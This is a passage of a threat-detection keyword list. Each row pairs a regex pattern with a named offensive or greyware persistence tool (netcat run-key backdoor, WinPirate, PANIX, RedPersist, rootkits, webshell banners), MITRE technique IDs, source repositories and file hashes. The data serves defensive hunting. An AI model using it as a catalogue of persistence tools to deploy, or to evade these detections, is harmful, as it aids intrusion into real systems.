496*\windows\currentversion\run -v netcat *.{0,1000}\\windows\\currentversion\\run\s\-v\snetcat\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A19723
497*\Windows\Temp\Bla.exe*.{0,1000}\\Windows\\Temp\\Bla\.exe.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide10N/AN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z19742
498*\WinPirate.bat*.{0,1000}\\WinPirate\.bat.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z19796
499*\WinPirate\Tools\*.{0,1000}\\WinPirate\\Tools\\.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z19797
500*\WinPirate-master*.{0,1000}\\WinPirate\-master.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z19798
501*\WSAAcceptBackdoor.*.{0,1000}\\WSAAcceptBackdoor\..{0,1000}offensive_tool_keywordWSAAcceptBackdoorWinsock accept() Backdoor ImplantT1574.001 - T1059 - T1213 - T1105 - T1546TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/EgeBalci/WSAAcceptBackdoor10N/AN/A102112232021-02-13T19:18:41Z2021-02-13T15:59:01Z19870
502*\WSAAcceptBackdoor-main*.{0,1000}\\WSAAcceptBackdoor\-main.{0,1000}offensive_tool_keywordWSAAcceptBackdoorWinsock accept() Backdoor ImplantT1574.001 - T1059 - T1213 - T1105 - T1546TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/EgeBalci/WSAAcceptBackdoor10N/AN/A102112232021-02-13T19:18:41Z2021-02-13T15:59:01Z19871
503*\XRulez.cpp*.{0,1000}\\XRulez\.cpp.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z19926
504*\XRulez.exe*.{0,1000}\\XRulez\.exe.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z19927
505*\XRulez.sln*.{0,1000}\\XRulez\.sln.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z19928
506*\XRulez.zip*.{0,1000}\\XRulez\.zip.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z19929
507*\XRulez\Injector\*.{0,1000}\\XRulez\\Injector\\.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z19930
508*] Cleaning At persistence methods*.{0,1000}\]\sCleaning\sAt\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19985
509*] Cleaning Backdoor binaries persistence methods*.{0,1000}\]\sCleaning\sBackdoor\sbinaries\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19986
510*] Cleaning Bind shell persistence methods*.{0,1000}\]\sCleaning\sBind\sshell\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19987
511*] Cleaning Cron persistence methods*.{0,1000}\]\sCleaning\sCron\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19988
512*] Cleaning Docker persistence methods*.{0,1000}\]\sCleaning\sDocker\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19989
513*] Cleaning Git persistence methods*.{0,1000}\]\sCleaning\sGit\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19990
514*] Cleaning initd persistence methods*.{0,1000}\]\sCleaning\sinitd\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19991
515*] Cleaning Malicious package persistence methods*.{0,1000}\]\sCleaning\sMalicious\spackage\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19992
516*] Cleaning MOTD persistence methods*.{0,1000}\]\sCleaning\sMOTD\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19993
517*] Cleaning Package Managers persistence methods*.{0,1000}\]\sCleaning\sPackage\sManagers\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19994
518*] Cleaning rc.local persistence methods*.{0,1000}\]\sCleaning\src\.local\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19995
519*] Cleaning setcap persistence methods*.{0,1000}\]\sCleaning\ssetcap\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19996
520*] Cleaning Setuid persistence methods*.{0,1000}\]\sCleaning\sSetuid\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19997
521*] Cleaning Shell profile persistence methods*.{0,1000}\]\sCleaning\sShell\sprofile\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19998
522*] Cleaning SSH persistence methods*.{0,1000}\]\sCleaning\sSSH\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z19999
523*] Cleaning Sudoers persistence methods*.{0,1000}\]\sCleaning\sSudoers\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z20000
524*] Cleaning Systemd Generator persistence methods*.{0,1000}\]\sCleaning\sSystemd\sGenerator\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z20001
525*] Cleaning Systemd persistence methods*.{0,1000}\]\sCleaning\sSystemd\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z20002
526*] Cleaning udev persistence methods*.{0,1000}\]\sCleaning\sudev\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z20003
527*] Cleaning XDG persistence methods*.{0,1000}\]\sCleaning\sXDG\spersistence\smethods.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z20004
528*] CreateService by Uknow*.{0,1000}\]\sCreateService\sby\sUknow.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10#contentN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z20011
529*] Eventviewer Persistence created*.{0,1000}\]\sEventviewer\sPersistence\screated.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z20023
530*] Extension Hijacking Persistence created*.{0,1000}\]\sExtension\sHijacking\sPersistence\screated.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z20026
531*] Hidden task xml file: *.{0,1000}\]\sHidden\stask\sxml\sfile\:\s.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z20036
532*] Powershell Persistence created*.{0,1000}\]\sPowershell\sPersistence\screated.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z20059
533*] Screensaver Persistence created*.{0,1000}\]\sScreensaver\sPersistence\screated.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z20067
534*] Startup Persistence created*.{0,1000}\]\sStartup\sPersistence\screated.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z20082
535*] UserInitMprLogonScript Persistence created*.{0,1000}\]\sUserInitMprLogonScript\sPersistence\screated.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z20093
536*<h1>.:NCC:. Shell v*.{0,1000}\<h1\>\.\:NCC\:\.\sShell\sv.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp text webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20229
537*<H1><center>-=[+] IDBTEAM SHELLS*.{0,1000}\<H1\>\<center\>\-\=\[\+\]\sIDBTEAM\sSHELLS.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10#contentphp text webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20230
538*<h2>Laudanum Tools*.{0,1000}\<h2\>Laudanum\sTools.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp text webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20243
539*<head><title>Wardom | Ne Mutlu T*.{0,1000}\<head\>\<title\>Wardom\s\|\sNe\sMutlu\sT.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20247
540*<SharedFolder name="*" hostPath="C:\" writable="true"/>*.{0,1000}\<SharedFolder\sname\=\".{0,1000}\"\shostPath\=\"C\:\\\"\swritable\=\"true\"\/\>.{0,1000}greyware_tool_keywordVirtualBoxadding the entire C drive as a shared folder for a VMT1021.001 - T1137 - T1072TA0006 - TA0008 - TA0005N/ARagnarLocker Persistencehttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/10N/AN/A1010N/AN/AN/AN/A20257
541*<title>Dynasty Persist</title>*.{0,1000}\<title\>Dynasty\sPersist\<\/title\>.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z20259
542*<title>Sosyete Safe Mode Bypass Shell -*.{0,1000}\<title\>Sosyete\sSafe\sMode\sBypass\sShell\s\-.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20261
543*<title>SyRiAn Sh3ll ~*.{0,1000}\<title\>SyRiAn\sSh3ll\s\~.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20262
544*<title>WebRoot Hack Tools"*.{0,1000}\<title\>WebRoot\sHack\sTools\".{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20263
545*=[ 1n73ct10n privat shell ]=*.{0,1000}\=\[\s1n73ct10n\sprivat\sshell\s\]\=.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20268
546*--==[[ Andela Yuwono Priv8 Shell ]]==--*.{0,1000}\-\-\=\=\[\[\sAndela\sYuwono\sPriv8\sShell\s\]\]\=\=\-\-.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z20271
547*===[[[ A Black Path Toward The Sun ]]]===*.{0,1000}\=\=\=\[\[\[\sA\sBlack\sPath\sToward\sThe\sSun\s\]\]\]\=\=\=.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS10N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z20280
548*>Near-Future Command Scheduler<*.{0,1000}\>Near\-Future\sCommand\sScheduler\<.{0,1000}greyware_tool_keywordatnowAtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TAT1053 - T1059TA0002 N/AAPT18 - APT29 - APT32 - Cobalt - RTMPersistencehttps://www.nirsoft.net/utils/atnow.html10#descriptionN/A77N/AN/AN/AN/A20455
549*>SandmanBackdoorTimeProvider<*.{0,1000}\>SandmanBackdoorTimeProvider\<.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#productnameN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z20514
550*>Seatbelt<*.{0,1000}\>Seatbelt\<.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10#productnamefp risks81040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z20516
551*006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7*.{0,1000}006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z20663
552*00D7268A-92A9-4CD4-ADDF-175E9BF16AE0*.{0,1000}00D7268A\-92A9\-4CD4\-ADDF\-175E9BF16AE0.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z20696
553*01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1*.{0,1000}01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z20769
554*021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79*.{0,1000}021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10#filehashN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z20780
555*023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570*.{0,1000}023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z20789
556*0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5*.{0,1000}0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#filehashN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z20828
557*032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b*.{0,1000}032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b.{0,1000}offensive_tool_keywordDispossessorscript used to install anydesk by the Dispossessor groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A20879
558*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*.{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#filehashN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z20901
559*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*.{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#filehashN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z20902
560*03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731*.{0,1000}03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z20925
561*05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362*.{0,1000}05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21054
